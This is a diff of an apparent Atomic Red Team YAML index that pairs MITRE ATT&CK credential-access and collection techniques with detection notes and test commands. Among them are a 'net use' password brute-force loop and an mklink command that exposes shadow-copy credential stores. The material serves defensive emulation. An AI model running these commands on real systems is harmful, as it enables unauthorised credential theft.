+ Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Windows
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1056.002:
technique:
@@ -18257,7 +19097,7 @@ credential-access:
are executed that need additional privileges than are present in the current
user context, it is common for the operating system to prompt the user for
proper credentials to authorize the elevated privileges for the task (ex:
- [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries
+ [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries
may mimic this functionality to prompt users for credentials with a seemingly
legitimate prompt for a number of reasons that mimic normal usage, such as
a fake installer requiring additional access or a fake malware removal suite.(Citation:
@@ -18566,9 +19406,9 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-24T21:29:13.900Z'
+ modified: '2020-10-21T01:31:35.760Z'
created: '2017-05-31T21:30:48.323Z'
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
x_mitre_data_sources:
@@ -18598,6 +19438,7 @@ credential-access:
- Linux
- macOS
- Windows
+ - Network
x_mitre_is_subtechnique: false
atomic_tests: []
T1558.003:
@@ -18636,6 +19477,9 @@ credential-access:
- source_name: mitre-attack
external_id: T1558.003
url: https://attack.mitre.org/techniques/T1558/003
+ - external_id: CAPEC-509
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/509.html
- url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
March 22, 2018.
@@ -18660,6 +19504,7 @@ credential-access:
- description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
Guard Dog of Hades. Retrieved March 22, 2018.
source_name: SANS Attacking Kerberos Nov 2014
+ url: https://redsiege.com/kerberoast-slides
- url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
Retrieved March 23, 2018.
@@ -18668,7 +19513,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-02-27T18:25:30.124Z'
+ modified: '2020-10-20T19:30:10.687Z'
created: '2020-02-11T18:43:38.588Z'
x_mitre_contributors:
- Praetorian
@@ -18686,7 +19531,7 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
identifier: T1558.003
atomic_tests:
- name: Request for service tickets
@@ -18781,15 +19626,21 @@ credential-access:
T1056.001:
technique:
id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4
- description: |-
- Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.
-
- Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
-
- * Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
- * Reading raw keystroke data from the hardware buffer.
- * Windows Registry modifications.
- * Custom drivers.
+ description: "Adversaries may log user keystrokes to intercept credentials as
+ the user types them. Keylogging is likely to be used to acquire credentials
+ for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003)
+ efforts are not effective, and may require an adversary to intercept keystrokes
+ on a system for a substantial period of time before credentials can be successfully
+ captured.\n\nKeylogging is the most prevalent type of input capture, with
+ many different ways of intercepting keystrokes.(Citation: Adventures of a
+ Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing
+ keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004),
+ this focuses solely on API functions intended for processing keystroke data.\n*
+ Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n*
+ Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601)
+ may provide adversaries with hooks into the operating system of network devices
+ to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device
+ Attacks) "
name: Keylogging
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -18805,20 +19656,25 @@ credential-access:
description: 'Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth
look into keyloggers on Windows. Retrieved April 27, 2016.'
source_name: Adventures of a Keystroke
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-24T20:45:52.998Z'
+ modified: '2020-10-21T01:30:56.227Z'
created: '2020-02-11T18:58:11.791Z'
x_mitre_platforms:
- Windows
- macOS
- Linux
+ - Network
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_detection: 'Keyloggers may take many forms, possibly involving modification
to the Registry and installation of a driver, setting a hook, or polling to
intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`,
@@ -19059,29 +19915,13 @@ credential-access:
elevation_required: true
T1003.001:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1003.001
- url: https://attack.mitre.org/techniques/T1003/001
- - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html
- description: Graeber, M. (2014, October). Analysis of Malicious Security Support
- Provider DLLs. Retrieved March 1, 2017.
- source_name: Graeber 2014
- - url: https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/
- description: Wilson, B. (2016, April 18). The Importance of KB2871997 and
- KB2928120 for Credential Protection. Retrieved April 11, 2018.
- source_name: TechNet Blogs Credential Protection
- - description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
- from Memory. Retrieved October 11, 2019.
- url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
- source_name: Medium Detecting Attempts to Steal Passwords from Memory
- - url: https://github.com/mattifestation/PowerSploit
- description: PowerSploit. (n.d.). Retrieved December 4, 2014.
- source_name: Powersploit
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: LSASS Memory
+ created: '2020-02-11T18:41:44.783Z'
+ modified: '2020-06-09T20:46:00.393Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
+ id: attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90
description: |
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -19105,32 +19945,48 @@ credential-access:
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
- id: attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-06-09T20:46:00.393Z'
- created: '2020-02-11T18:41:44.783Z'
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
- x_mitre_data_sources:
- - Process command-line parameters
- - PowerShell logs
- - Process monitoring
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
+ name: LSASS Memory
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1003.001
+ url: https://attack.mitre.org/techniques/T1003/001
+ - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html
+ description: Graeber, M. (2014, October). Analysis of Malicious Security Support
+ Provider DLLs. Retrieved March 1, 2017.
+ source_name: Graeber 2014
+ - url: https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/
+ description: Wilson, B. (2016, April 18). The Importance of KB2871997 and
+ KB2928120 for Credential Protection. Retrieved April 11, 2018.
+ source_name: TechNet Blogs Credential Protection
+ - description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
+ from Memory. Retrieved October 11, 2019.
+ url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
+ source_name: Medium Detecting Attempts to Steal Passwords from Memory
+ - url: https://github.com/mattifestation/PowerSploit
+ description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+ source_name: Powersploit
+ x_mitre_platforms:
+ - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
x_mitre_detection: |-
Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.
Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Windows
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - PowerShell logs
+ - Process monitoring
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
identifier: T1003.001
atomic_tests:
- name: Windows Credential Editor
@@ -19416,7 +20272,7 @@ credential-access:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
- modified: '2020-03-31T13:54:08.535Z'
+ modified: '2020-10-16T15:19:48.733Z'
created: '2020-02-11T19:07:12.114Z'
x_mitre_contributors:
- Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project
@@ -19429,7 +20285,7 @@ credential-access:
- Packet capture
x_mitre_permissions_required:
- User
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
@@ -19477,7 +20333,7 @@ credential-access:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-07-13T21:23:01.762Z'
+ modified: '2020-10-21T02:41:11.743Z'
created: '2020-02-11T19:01:56.887Z'
x_mitre_data_sources:
- File monitoring
@@ -19508,12 +20364,13 @@ credential-access:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g., a user has an active
login session but has not entered the building or does not have VPN access)."
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- Linux
- macOS
+ - Network
atomic_tests: []
T1003.003:
technique:
@@ -19775,6 +20632,54 @@ credential-access:
mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
name: command_prompt
elevation_required: true
+ T1556.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1556.004
+ url: https://attack.mitre.org/techniques/T1556/004
+ - source_name: FireEye - Synful Knock
+ url: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html
+ description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful
+ Knock - A Cisco router implant - Part I. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Image File Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Image File Verification. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ description: |-
+ Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
+
+ [Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock)
+ name: Network Device Authentication
+ id: attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-10-21T02:41:11.550Z'
+ created: '2020-10-19T17:58:04.155Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: |-
+ Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
+
+ Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601).
+ x_mitre_data_sources:
+ - File monitoring
+ x_mitre_platforms:
+ - Network
+ atomic_tests: []
T1040:
technique:
created: '2017-05-31T21:30:41.399Z'
@@ -20169,6 +21074,9 @@ credential-access:
- source_name: mitre-attack
external_id: T1110.002
url: https://attack.mitre.org/techniques/T1110/002
+ - external_id: CAPEC-55
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/55.html
- url: https://en.wikipedia.org/wiki/Password_cracking
description: Wikipedia. (n.d.). Password cracking. Retrieved December 23,
2015.
@@ -20193,7 +21101,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-07-09T17:01:18.054Z'
+ modified: '2020-09-16T15:39:59.041Z'
created: '2020-02-11T18:38:56.197Z'
x_mitre_data_sources:
- Authentication logs
@@ -20205,7 +21113,7 @@ credential-access:
efforts on detecting other adversary behavior used to acquire credential materials,
such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003)
or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
@@ -20359,10 +21267,13 @@ credential-access:
- source_name: mitre-attack
external_id: T1110.001
url: https://attack.mitre.org/techniques/T1110/001
- - url: https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf
+ - external_id: CAPEC-49
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/49.html
+ - source_name: Cylance Cleaver
description: Cylance. (2014, December). Operation Cleaver. Retrieved September
14, 2017.
- source_name: Cylance Cleaver
+ url: https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf
- source_name: US-CERT TA18-068A 2018
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
@@ -20399,7 +21310,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-29T17:11:46.504Z'
+ modified: '2020-10-19T22:43:45.126Z'
created: '2020-02-11T18:38:22.617Z'
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
@@ -20412,7 +21323,7 @@ credential-access:
failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If
authentication failures are high, then there may be a brute force attempt
to gain access to a system using legitimate credentials.
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
@@ -20463,12 +21374,6 @@ credential-access:
@FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
T1110.003:
technique:
- created: '2020-02-11T18:39:25.122Z'
- modified: '2020-03-29T17:13:57.172Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- type: attack-pattern
id: attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c
description: |-
Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -20499,6 +21404,9 @@ credential-access:
- source_name: mitre-attack
external_id: T1110.003
url: https://attack.mitre.org/techniques/T1110/003
+ - external_id: CAPEC-565
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/565.html
- url: http://www.blackhillsinfosec.com/?p=4645
description: Thyer, J. (2015, October 30). Password Spraying & Other Fun with
RPCCLIENT. Retrieved April 25, 2017.
@@ -20511,6 +21419,12 @@ credential-access:
url: https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing
description: 'Metcalf, S. (2018, May 6). Trimarc Research: Detecting Password
Spraying with Security Event Auditing. Retrieved January 16, 2019.'
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ modified: '2020-10-19T22:43:45.579Z'
+ created: '2020-02-11T18:39:25.122Z'
x_mitre_platforms:
- Linux
- macOS
@@ -20522,7 +21436,7 @@ credential-access:
- Azure AD
- SaaS
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_detection: |-
Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Specifically, monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.
@@ -21277,6 +22191,9 @@ credential-access:
- source_name: mitre-attack
external_id: T1558
url: https://attack.mitre.org/techniques/T1558
+ - external_id: CAPEC-652
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/652.html
- source_name: ADSecurity Kerberos Ring Decoder
url: https://adsecurity.org/?p=227
description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
@@ -21330,7 +22247,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-31T12:59:11.121Z'
+ modified: '2020-09-29T16:16:06.868Z'
created: '2020-02-11T19:12:46.830Z'
x_mitre_system_requirements:
- Kerberos authentication enabled
@@ -21356,7 +22273,7 @@ credential-access:
access the LSA Subsystem Service (LSASS) process by opening the process, locating
the LSA secrets key, and decrypting the sections in memory where credential
details, including Kerberos tickets, are stored."
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
@@ -21461,7 +22378,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-06-17T14:25:38.461Z'
+ modified: '2020-10-15T19:39:36.109Z'
created: '2020-02-04T12:47:23.631Z'
x_mitre_platforms:
- Linux
@@ -21478,7 +22395,7 @@ credential-access:
- Administrator
- SYSTEM
x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_detection: |-
While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.
@@ -21488,6 +22405,10 @@ credential-access:
Additionally, monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.
x_mitre_data_sources:
+ - Azure activity logs
+ - Authentication logs
+ - AWS CloudTrail logs
+ - Windows event logs
- File monitoring
- Windows Registry
- Process monitoring
@@ -21495,23 +22416,6 @@ credential-access:
atomic_tests: []
T1056.003:
technique:
- created: '2020-02-11T18:59:50.058Z'
- modified: '2020-03-24T21:16:16.580Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- type: attack-pattern
- id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
- description: |-
- Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
-
- This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)
- name: Web Portal Capture
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1056.003
@@ -21523,19 +22427,2728 @@ credential-access:
description: 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco
Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.'
source_name: Volexity Virtual Private Keylogging
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Web Portal Capture
+ description: |-
+ Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
+
+ This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)
+ id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ modified: '2020-03-24T21:16:16.580Z'
+ created: '2020-02-11T18:59:50.058Z'
+ x_mitre_system_requirements:
+ - An externally facing login portal is configured.
+ x_mitre_data_sources:
+ - File monitoring
+ x_mitre_detection: File monitoring may be used to detect changes to files in
+ the Web directory for organization login pages that do not match with authorized
+ updates to the Web server's content.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
+ atomic_tests: []
+collection:
+ T1557.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1557.002
+ url: https://attack.mitre.org/techniques/T1557/002
+ - source_name: RFC826 ARP
+ url: https://tools.ietf.org/html/rfc826
+ description: Plummer, D. (1982, November). An Ethernet Address Resolution
+ Protocol. Retrieved October 15, 2020.
+ - source_name: Sans ARP Spoofing Aug 2003
+ url: https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411
+ description: Siles, R. (2003, August). Real World ARP Spoofing. Retrieved
+ October 15, 2020.
+ - source_name: Cylance Cleaver
+ description: Cylance. (2014, December). Operation Cleaver. Retrieved September
+ 14, 2017.
+ url: https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: ARP Cache Poisoning
+ description: |
+ Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).
+
+ The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.
+
+ An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.
+
+ The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
+
+ Adversaries may use ARP cache poisoning as a means to man-in-the-middle (MiTM) network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
+ id: attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-10-16T15:22:11.604Z'
+ created: '2020-10-15T12:05:58.755Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
+ ARP replies may be suspicious. \n\nConsider collecting changes to ARP caches
+ across endpoints for signs of ARP poisoning. For example, if multiple IP addresses
+ map to a single MAC address, this could be an indicator that the ARP cache
+ has been poisoned."
+ x_mitre_data_sources:
+ - Packet capture
+ - Netflow/Enclave netflow
+ x_mitre_contributors:
+ - Jon Sternstein, Stern Security
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ atomic_tests: []
+ T1560:
+ technique:
+ id: attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a
+ description: |-
+ An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
+
+ Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.
+ name: Archive Collected Data
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1560
+ url: https://attack.mitre.org/techniques/T1560
+ - url: https://en.wikipedia.org/wiki/List_of_file_signatures
+ description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
+ April 22, 2016.
+ source_name: Wikipedia File Header Signatures
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-10-21T16:36:55.831Z'
+ created: '2020-02-20T20:53:45.725Z'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ - File monitoring
+ - Binary file metadata
+ x_mitre_detection: |-
+ Archival software and archived files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
+
+ A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.
+
+ Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ identifier: T1560
+ atomic_tests:
+ - name: Compress Data for Exfiltration With PowerShell
+ auto_generated_guid: 41410c60-614d-4b9d-b66e-b0192dd9c597
+ description: "An adversary may compress data (e.g., sensitive documents) that
